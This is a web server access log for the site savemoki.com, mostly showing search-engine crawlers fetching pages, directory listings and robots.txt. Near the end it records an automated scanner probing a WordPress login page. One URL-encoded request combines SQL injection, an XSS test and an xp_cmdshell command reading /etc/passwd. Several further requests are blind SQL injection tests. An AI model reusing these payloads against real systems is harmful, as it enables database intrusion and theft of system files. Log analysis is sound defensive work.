114.119.134.192 - - [03/Sep/2022:21:37:03 -0700] "GET /blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/PSD/?C=M%3BO%3DA HTTP/1.1" 200 419 "https://www.savemoki.com/blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/PSD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
51.222.253.15 - - [03/Sep/2022:21:39:23 -0700] "GET / HTTP/1.1" 200 1285 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.savemoki.com"
114.119.156.133 - - [03/Sep/2022:21:43:41 -0700] "GET /blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/licensing/ HTTP/1.1" 200 419 "https://www.savemoki.com/blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
54.159.7.14 - - [03/Sep/2022:21:44:46 -0700] "GET /Links.html HTTP/1.1" 200 8682 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12" "www.savemoki.com"
114.119.139.148 - - [03/Sep/2022:21:49:46 -0700] "GET /blog/wp-content/themes?M=A HTTP/1.1" 301 1423 "https://savemoki.com/blog/wp-content/themes?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.139.148 - - [03/Sep/2022:21:50:02 -0700] "GET /blog/wp-content/themes/?M=A HTTP/1.1" 200 405 "https://savemoki.com/blog/wp-content/themes?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
51.222.253.19 - - [03/Sep/2022:21:52:13 -0700] "GET / HTTP/1.1" 200 1285 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.savemoki.com"
216.244.66.249 - - [03/Sep/2022:22:05:06 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "savemoki.com"
216.244.66.249 - - [03/Sep/2022:22:05:06 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.savemoki.com"
51.222.253.18 - - [03/Sep/2022:22:07:01 -0700] "GET /robots.txt HTTP/1.1" 200 55 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "savemoki.com"
51.222.253.18 - - [03/Sep/2022:22:07:02 -0700] "GET /New2.html HTTP/1.1" 200 561 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "savemoki.com"
37.139.53.84 - - [03/Sep/2022:22:10:48 -0700] "GET /contact_us.html HTTP/1.1" 200 18024 "http://savemoki.com/contact_us.html" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4093.3 Safari/537.36" "savemoki.com"
114.119.139.183 - - [03/Sep/2022:22:11:26 -0700] "GET /images?D=A HTTP/1.1" 301 1413 "https://www.savemoki.com/images?M=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
114.119.139.183 - - [03/Sep/2022:22:11:33 -0700] "GET /images/?D=A HTTP/1.1" 200 2158 "https://www.savemoki.com/images?M=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
114.119.156.133 - - [03/Sep/2022:22:17:22 -0700] "GET /navigation_bars?C=S%3BO%3DA HTTP/1.1" 301 1426 "https://www.savemoki.com/navigation_bars?S=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
114.119.156.133 - - [03/Sep/2022:22:17:36 -0700] "GET /navigation_bars/?C=S%3BO%3DA HTTP/1.1" 200 408 "https://www.savemoki.com/navigation_bars?S=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
51.222.253.5 - - [03/Sep/2022:22:21:12 -0700] "GET /clipart/lines/horizontal/?C=D;O=D HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "savemoki.com"
114.119.139.183 - - [03/Sep/2022:22:26:47 -0700] "GET /blog?S=A HTTP/1.1" 301 1411 "https://savemoki.com/blog?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.139.183 - - [03/Sep/2022:22:26:52 -0700] "GET /blog/?S=A HTTP/1.1" 200 352 "https://savemoki.com/blog?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
82.118.29.247 - - [03/Sep/2022:22:29:56 -0700] "GET /blog1/2015/05/07/test-post/ HTTP/1.1" 404 73 "http://savemoki.com/blog1/2015/05/07/test-post/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "savemoki.com"
82.118.29.247 - - [03/Sep/2022:22:29:57 -0700] "GET / HTTP/1.1" 200 7350 "http://savemoki.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "savemoki.com"
114.119.134.192 - - [03/Sep/2022:22:34:19 -0700] "GET /blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/?C=D%3BO%3DA HTTP/1.1" 200 513 "https://savemoki.com/blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1?N=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
51.222.253.8 - - [03/Sep/2022:22:36:10 -0700] "GET /Shop.html HTTP/1.1" 200 2842 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.savemoki.com"
114.119.139.148 - - [03/Sep/2022:22:39:49 -0700] "GET /socialenginetrial?C=N%3BO%3DD HTTP/1.1" 301 1431 "https://www.savemoki.com/socialenginetrial?D=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
114.119.139.148 - - [03/Sep/2022:22:39:55 -0700] "GET /socialenginetrial/?C=N%3BO%3DD HTTP/1.1" 200 318 "https://www.savemoki.com/socialenginetrial?D=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
154.54.249.194 - - [03/Sep/2022:22:40:01 -0700] "GET /blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/sample%20content/?C=M;O=D HTTP/1.1" 200 570 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)" "savemoki.com"
154.54.249.194 - - [03/Sep/2022:22:40:41 -0700] "GET /navigation_bars/?C=D;O=D HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)" "savemoki.com"
114.119.139.185 - - [03/Sep/2022:22:46:44 -0700] "GET /blog?N=A HTTP/1.1" 301 1411 "https://savemoki.com/blog?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.139.185 - - [03/Sep/2022:22:46:53 -0700] "GET /blog/?N=A HTTP/1.1" 200 352 "https://savemoki.com/blog?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
185.119.81.99 - - [03/Sep/2022:22:47:44 -0700] "GET /2test/wp-login.php HTTP/1.1" 200 6053 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "savemoki.com"
10.213.116.64 - - [03/Sep/2022:22:47:47 -0700] "POST /2test/wp-cron.php?doing_wp_cron=1662270467.2325830459594726562500 HTTP/1.1" 200 - "http://savemoki.com/2test/wp-cron.php?doing_wp_cron=1662270467.2325830459594726562500" "WordPress/5.4.11; http://savemoki.com/2test" "savemoki.com"
185.119.81.99 - - [03/Sep/2022:22:47:48 -0700] "POST /2test/wp-login.php HTTP/1.1" 200 6341 "http://savemoki.com/2test/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "savemoki.com"
216.244.66.249 - - [03/Sep/2022:22:51:06 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "savemoki.com"
216.244.66.249 - - [03/Sep/2022:22:51:06 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.savemoki.com"
114.119.139.148 - - [03/Sep/2022:22:59:43 -0700] "GET /blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/sample%20content?S=A HTTP/1.1" 301 1466 "https://savemoki.com/blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/sample%20content?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.139.148 - - [03/Sep/2022:22:59:59 -0700] "GET /blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/sample%20content/?S=A HTTP/1.1" 200 576 "https://savemoki.com/blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/sample%20content?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.139.148 - - [03/Sep/2022:23:06:30 -0700] "GET /sitebuilder/images?M=D HTTP/1.1" 301 1422 "https://www.savemoki.com/sitebuilder/images?M=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
114.119.139.148 - - [03/Sep/2022:23:06:47 -0700] "GET /sitebuilder/images/?M=D HTTP/1.1" 200 3814 "https://www.savemoki.com/sitebuilder/images?M=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
114.119.156.133 - - [03/Sep/2022:23:18:25 -0700] "GET /blog/wp-content/themes HTTP/1.1" 301 1418 "https://savemoki.com/blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.156.133 - - [03/Sep/2022:23:18:33 -0700] "GET /blog/wp-content/themes/ HTTP/1.1" 200 405 "https://savemoki.com/blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.139.185 - - [03/Sep/2022:23:25:28 -0700] "GET /clipart/bullets/ HTTP/1.1" 200 429 "https://savemoki.com/clipart?N=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.156.133 - - [03/Sep/2022:23:31:08 -0700] "GET /clipart/pageHeaders?S=A HTTP/1.1" 301 1421 "https://savemoki.com/clipart/pageHeaders?N=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.156.133 - - [03/Sep/2022:23:31:13 -0700] "GET /clipart/pageHeaders/?S=A HTTP/1.1" 200 427 "https://savemoki.com/clipart/pageHeaders?N=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
216.244.66.249 - - [03/Sep/2022:23:36:02 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.savemoki.com"
216.244.66.249 - - [03/Sep/2022:23:36:02 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "savemoki.com"
114.119.156.133 - - [03/Sep/2022:23:37:27 -0700] "GET /socialenginetrial?D=D HTTP/1.1" 301 1422 "https://www.savemoki.com/socialenginetrial?D=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
114.119.156.133 - - [03/Sep/2022:23:37:31 -0700] "GET /socialenginetrial/?D=D HTTP/1.1" 200 318 "https://www.savemoki.com/socialenginetrial?D=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
114.119.134.192 - - [03/Sep/2022:23:45:32 -0700] "GET /specialthanks.html HTTP/1.1" 200 2923 "http://www.savemoki.com/MedicalRecord.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
71.202.197.220 - - [03/Sep/2022:23:46:15 -0700] "GET /2test/index.php/comments/feed/ HTTP/1.1" 200 1847 "-" "-" "savemoki.com"
10.213.116.62 - - [03/Sep/2022:23:46:18 -0700] "POST /2test/wp-cron.php?doing_wp_cron=1662273978.4370388984680175781250 HTTP/1.1" 200 - "http://savemoki.com/2test/wp-cron.php?doing_wp_cron=1662273978.4370388984680175781250" "WordPress/5.4.11; http://savemoki.com/2test" "savemoki.com"
114.119.134.192 - - [03/Sep/2022:23:51:50 -0700] "GET /socialenginetrial?N=D HTTP/1.1" 301 1421 "https://savemoki.com/socialenginetrial?N=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.134.192 - - [03/Sep/2022:23:51:56 -0700] "GET /socialenginetrial/?N=D HTTP/1.1" 200 318 "https://savemoki.com/socialenginetrial?N=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
51.222.253.12 - - [03/Sep/2022:23:54:12 -0700] "GET /clipart/images/?C=M;O=A HTTP/1.1" 200 487 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "savemoki.com"
154.54.249.194 - - [03/Sep/2022:23:55:38 -0700] "GET /2test/index.php/category/uncategorized/feed/ HTTP/1.1" 200 1956 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)" "savemoki.com"
114.119.134.192 - - [03/Sep/2022:23:58:02 -0700] "GET /sitebuilder/images/?C=S%3BO%3DA HTTP/1.1" 200 3814 "https://savemoki.com/sitebuilder/images?S=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "savemoki.com"
114.119.134.192 - - [04/Sep/2022:00:03:41 -0700] "GET /blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/PSD/?C=N%3BO%3DD HTTP/1.1" 200 419 "https://www.savemoki.com/blog/wp-content/themes/themeforest-625914-ice-theme-powerful-wordpress-theme-1/PSD/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
68.126.192.247 - - [04/Sep/2022:00:04:24 -0700] "GET / HTTP/1.1" 200 7350 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" "savemoki.com"
78.31.71.105 - - [04/Sep/2022:00:04:31 -0700] "GET /contact_us.html HTTP/1.1" 200 18024 "http://savemoki.com/contact_us.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "savemoki.com"
114.119.134.192 - - [04/Sep/2022:00:10:07 -0700] "GET /clipart/backgrounds/fullpage/?C=N%3BO%3DD HTTP/1.1" 200 389 "https://www.savemoki.com/clipart/backgrounds/fullpage?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
5.255.253.167 - - [04/Sep/2022:00:13:15 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "savemoki.com"
5.45.207.154 - - [04/Sep/2022:00:13:19 -0700] "GET /blog/?C=M;O=A HTTP/1.1" 200 352 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "savemoki.com"
185.119.81.99 - - [04/Sep/2022:00:13:47 -0700] "GET /2test/wp-login.php HTTP/1.1" 200 6050 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36" "savemoki.com"
185.119.81.99 - - [04/Sep/2022:00:13:52 -0700] "POST /2test/wp-login.php HTTP/1.1" 200 6339 "http://savemoki.com/2test/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36" "savemoki.com"
114.119.139.148 - - [04/Sep/2022:00:16:21 -0700] "GET /yahoo_site_admin/ HTTP/1.1" 200 5367 "http://www.savemoki.com/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
117.42.218.64 - - [04/Sep/2022:00:18:07 -0700] "GET /contact_us.html HTTP/1.1" 200 18024 "http://savemoki.com/contact_us.html" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "savemoki.com"
216.244.66.249 - - [04/Sep/2022:00:22:39 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "savemoki.com"
216.244.66.249 - - [04/Sep/2022:00:22:39 -0700] "GET /robots.txt HTTP/1.1" 200 39 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.savemoki.com"
114.119.138.100 - - [04/Sep/2022:00:33:18 -0700] "GET /robots.txt HTTP/1.1" 200 55 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
37.139.53.84 - - [04/Sep/2022:00:36:37 -0700] "GET /contact_us.html HTTP/1.1" 200 18024 "http://savemoki.com/contact_us.html" "Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.34 Safari/537.36 Edg/83.0.478.25" "savemoki.com"
114.119.139.148 - - [04/Sep/2022:00:36:57 -0700] "GET /clipart/backgrounds/fullpage/ HTTP/1.1" 200 389 "https://www.savemoki.com/clipart/backgrounds?S=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
43.153.171.136 - - [04/Sep/2022:00:41:44 -0700] "GET /contact_us.html HTTP/1.1" 200 18024 "http://savemoki.com/contact_us.html" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "savemoki.com"
114.119.139.183 - - [04/Sep/2022:00:43:06 -0700] "GET /mokis_medical_records HTTP/1.1" 200 3287 "http://www.savemoki.com/special_thanks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:43:19 -0700] "GET /2test/wp-login.php?action=&post_password= HTTP/1.1" 200 6057 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:43:25 -0700] "GET /2test/wp-login.php?action=&post_password=&aGyz%3D5623%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 6058 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
10.213.116.63 - - [04/Sep/2022:00:43:23 -0700] "POST /2test/wp-cron.php?doing_wp_cron=1662277403.5606300830841064453125 HTTP/1.1" 200 - "http://savemoki.com/2test/wp-cron.php?doing_wp_cron=1662277403.5606300830841064453125" "WordPress/5.4.11; http://savemoki.com/2test" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:43:30 -0700] "GET /2test/wp-login.php?action=&post_password= HTTP/1.1" 200 6060 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:43:32 -0700] "GET /2test/wp-login.php?action=5905&post_password= HTTP/1.1" 200 6055 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:43:45 -0700] "GET /2test/wp-login.php?action=%28%2C%2C%27.%28.%29%29%28&post_password= HTTP/1.1" 200 6054 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:43:48 -0700] "GET /2test/wp-login.php?action=%27IflodW%3C%27%22%3EVJlVQz&post_password= HTTP/1.1" 200 6058 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:43:53 -0700] "GET /2test/wp-login.php?action=%29%20AND%206832%3D7074%20AND%20%282460%3D2460&post_password= HTTP/1.1" 200 6050 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:43:57 -0700] "GET /2test/wp-login.php?action=%29%20AND%208272%3D8272%20AND%20%287712%3D7712&post_password= HTTP/1.1" 200 6053 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:00 -0700] "GET /2test/wp-login.php?action=%29%20AND%209629%3D6028%20AND%20%282680%3D2680&post_password= HTTP/1.1" 200 6058 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:02 -0700] "GET /2test/wp-login.php?action=%20AND%203698%3D2969&post_password= HTTP/1.1" 200 6060 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:04 -0700] "GET /2test/wp-login.php?action=%20AND%208272%3D8272&post_password= HTTP/1.1" 200 6059 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:06 -0700] "GET /2test/wp-login.php?action=%20AND%203757%3D3796&post_password= HTTP/1.1" 200 6057 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:08 -0700] "GET /2test/wp-login.php?action=%27%29%20AND%204335%3D2432%20AND%20%28%27iPha%27%3D%27iPha&post_password= HTTP/1.1" 200 6054 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:10 -0700] "GET /2test/wp-login.php?action=%27%29%20AND%208272%3D8272%20AND%20%28%27sVpG%27%3D%27sVpG&post_password= HTTP/1.1" 200 6058 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
